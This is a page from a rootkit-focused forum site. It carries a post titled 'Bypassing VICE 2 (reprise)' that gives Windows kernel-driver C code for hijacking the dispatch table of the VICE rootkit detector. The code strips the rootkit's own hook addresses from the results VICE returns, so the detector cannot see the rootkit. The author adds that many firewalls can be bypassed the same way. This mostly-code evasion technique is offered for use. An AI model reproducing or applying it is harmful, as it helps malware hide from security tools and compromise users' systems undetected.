main menuhome
forums
Show me new threads!
bookmarks
view blogs
vault you must be level 2 to upload files to your vault
downloads you must be logged on, and level 1, to access downloads
Rootkit Collection
A news back-end to implement RootKit news into your website is here or more advanced version here.
An XML/RSS feed that includes both NEWS and BLOGS for RootKit is here: XML/RSS.
![[Valid RSS]](valid-rss.png "Validate my RSS feed")
Beta feed for replied posts here. feedback to admins not forums, we know about times being off...
|
ROOTKIT
Will RE for Cash
|
Thursday September 09th |
| | Featured Article: Nostalgia: n00bk1t, an advanced ring3 rootkit in C by jeffosz | Bypassing VICE 2 (reprise)
By: valerinoHi dudes. I've just stumbled in the new VICE, and read the article by OpCode.
Well, nice trick, but really i don't see the point.....
VICE, as all drivers (some firewalls included, play a bit and you'll find which) can be quickly bypassed with
a simpler method : hijacking its dispatch table and masking the buffer it
sends back to its usermode client.
Just a quick trip thru DevFilter or OSR's IrpTracker reveals the IOCTL which sends back the buffer filled with "hooker" addresses.
Knowing this, its trivial.... here's some snippets (some of the functions used are from my private library i can't release, but their implementation is trivial and can be easily deduced by the names):
///////////////////////////////////////////////////////////////////////////
A) we need a NotifyLoadModule routine which does this :
VOID ModuleLoadNotify(IN PUNICODE_STRING FullImageName, IN HANDLE ProcessId, IN PIMAGE_INFO ImageInfo)
{
....................................................
if (Utilwcsstrsize(FullImageName->Buffer, VICE_DRIVER_NAME, FullImageName->Length, wcslen(VICE_DRIVER_NAME) * sizeof(WCHAR)))
{
// vice is being loaded, initialize a DPC to patch it immediately
// after this function return
KeInitializeTimerEx(&TimerVicePatch, SynchronizationTimer);
ViceFireDpcDelay.QuadPart = RELATIVE(MILLISECONDS(100));
KeSetTimer(&TimerVicePatch,ViceFireDpcDelay,&VicePatchDpc);
KeInitializeDpc(&VicePatchDpc,(PKDEFERRED_ROUTINE)ModVicePatch,NULL);
KDebugPrint (1,("%s Found VICE.\n",MODULE));
....................................................
}
B) having set up the DPC, here's the related routines
//************************************************************************
// NTSTATUS ModViceComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context)
//
// Complete VICE DeviceControl irp, and mask the buffer removing our addresses
//************************************************************************/
NTSTATUS ModViceComplete(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context)
{
char* pBuffer = NULL;
BOOLEAN found = TRUE;
BYTE* pTarget = NULL;
ULONG Length;
PIO_STACK_LOCATION IrpSp;
PNONPAGED_COMPLETION_CTX pCtx;
ULONG Address;
IrpSp = IoGetCurrentIrpStackLocation(Irp);
pCtx = (PNONPAGED_COMPLETION_CTX)Context;
// get size and buffer
Length = Irp->IoStatus.Information;
pBuffer = Irp->AssociatedIrp.SystemBuffer;
// check addresses of our hooks and mask'em if found
Address = (ULONG)FWallMyZwWriteFile;
pTarget = UtilFindBufInBuf(pBuffer,(BYTE*)&Address,Length,sizeof (ULONG));
if (pTarget)
{
memset (pTarget,0,sizeof (ULONG));
}
Address = (ULONG)RegistryMyZwEnumerateKey;
pTarget = UtilFindBufInBuf(pBuffer,(BYTE*)&Address,Length,sizeof (ULONG));
if (pTarget)
{
memset (pTarget,0,sizeof (ULONG));
}
Address = (ULONG)RegistryMyZwQueryKey;
pTarget = UtilFindBufInBuf(pBuffer,(BYTE*)&Address,Length,sizeof (ULONG));
if (pTarget)
{
memset (pTarget,0,sizeof (ULONG));
}
Address = (ULONG)RegistryMyZwOpenKey;
pTarget = UtilFindBufInBuf(pBuffer,(BYTE*)&Address,Length,sizeof (ULONG));
if (pTarget)
{
memset (pTarget,0,sizeof (ULONG));
}
// signal event and exit
KeSetEvent(&pCtx->Event,IO_NO_INCREMENT,FALSE);
return STATUS_SUCCESS;
}
/***********************************************************************
* NTSTATUS ModViceBypassDeviceControl(PDEVICE_OBJECT pDeviceObject, PIRP Irp)
*
* Replacement DeviceControl dispatch for VICE
***********************************************************************/
NTSTATUS ModViceBypassDeviceControl(PDEVICE_OBJECT pDeviceObject, PIRP Irp)
{
PIO_STACK_LOCATION IrpSp;
PNONPAGED_COMPLETION_CTX pCtx = NULL;
NTSTATUS Status;
IrpSp = IoGetCurrentIrpStackLocation(Irp);
// check controlcode
if (IrpSp->Parameters.DeviceIoControl.IoControlCode != 0x55108004)
{
return ModViceRealDeviceControl(pDeviceObject,Irp);
}
pCtx = ExAllocateFromNPagedLookasideList(&NonPagedHooksCtxLookaside);
if (!pCtx)
{
return ModViceRealDeviceControl(pDeviceObject,Irp);
}
// install completion routine in *this* stack location (dirty hack :))
// we install a completion routine since we need to peek in the irp buffer
// *after* the real dispatch has been done.
KeInitializeEvent(&pCtx->Event,NotificationEvent,FALSE);
IrpSp->CompletionRoutine = ModViceComplete;
IrpSp->Context = pCtx;
IrpSp->Control = 0;
IrpSp->Control = SL_INVOKE_ON_SUCCESS | SL_INVOKE_ON_CANCEL | SL_INVOKE_ON_ERROR;
// call real handler
Status = ModViceRealDeviceControl(pDeviceObject, Irp);
// and wait for completion
KeWaitForSingleObject(&pCtx->Event,Executive,KernelMode,FALSE,NULL);
ExFreeToNPagedLookasideList(&NonPagedHooksCtxLookaside,pCtx);
return Status;
}
//************************************************************************
// VOID ModVicePatchWorkRoutine (PDEVICE_OBJECT DeviceObject, PVOID Context)
//
// Workroutine to patch VICE from DPC
//************************************************************************/
VOID ModVicePatchWorkRoutine (PDEVICE_OBJECT DeviceObject, PVOID Context)
{
PDRIVER_OBJECT pDriverObject;
UNICODE_STRING ucName;
KIRQL OldIrql;
RtlInitUnicodeString(&ucName,L"\\Driver\\VICESYS");
// this must be called at PASSIVE_LEVEL (ObOpenObjectByName,etc...)
pDriverObject = UtilGetObjectByName(&ucName);
if (!pDriverObject)
{
KDebugPrint(1, ("%s Can't find VICE driver.\n", MODULE));
goto __exit;
}
// patch the dispatch table
KeRaiseIrql(DISPATCH_LEVEL,&OldIrql);
ModViceRealDeviceControl = pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL];
pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = ModViceBypassDeviceControl;
KeLowerIrql(OldIrql);
KDebugPrint(1, ("%s Patched VICE trojan detector.\n", MODULE));
ObDereferenceObject(pDriverObject);
__exit:
IoFreeWorkItem(Context);
}
//************************************************************************
// VOID ModVicePatch()
//
// DPC to Patch VICE dispatch table
//************************************************************************/
VOID ModVicePatch(IN PKDPC Dpc, IN PVOID DeferredContext, IN PVOID SystemArgument1, IN PVOID SystemArgument2)
{
PIO_WORKITEM pWrkItem;
// we don't need the timer anymore
KeCancelTimer(&TimerVicePatch);
// use a workitem to do the stuff since we're at dispatch_level now
pWrkItem = IoAllocateWorkItem(MyDrvObj->DeviceObject);
if (pWrkItem)
{
IoQueueWorkItem(pWrkItem,ModVicePatchWorkRoutine,CriticalWorkQueue,
pWrkItem);
}
}
///////////////////////////////////////////////////////////////////////////
Here it is ..... easy no ?
There's no way to protect from this, unless a driver protect its dispatch table by modifying PTE. As i said, many firewall can be bypassed with the same (more or less) method.
Kudos to all the guys here, you're all really smart :)
Regards,
Valerino
valerino@bonbon.net
|
| |
ROOTKITS, Subverting the Windows Kernel
By: Greg Hoglund and Jamie Butler
Rootkits are powerful tools to compromise computer systems without detection. Get the original and best book on the subject here.
|
active for last 5 minutes
registered users:80369
There are currently 0 registered users and 20 guests browsing the website.
Welcome our latest registered user: rats1990
| Aug 24, 04:27 |
| Aug 16, 04:49 |
| Aug 13, 16:44 |
| Aug 09, 15:25 |
| Aug 05, 15:52 |
| Best Screenshots / Analog |
| the most active news users |
based on the number of news posts for last 30 days
|
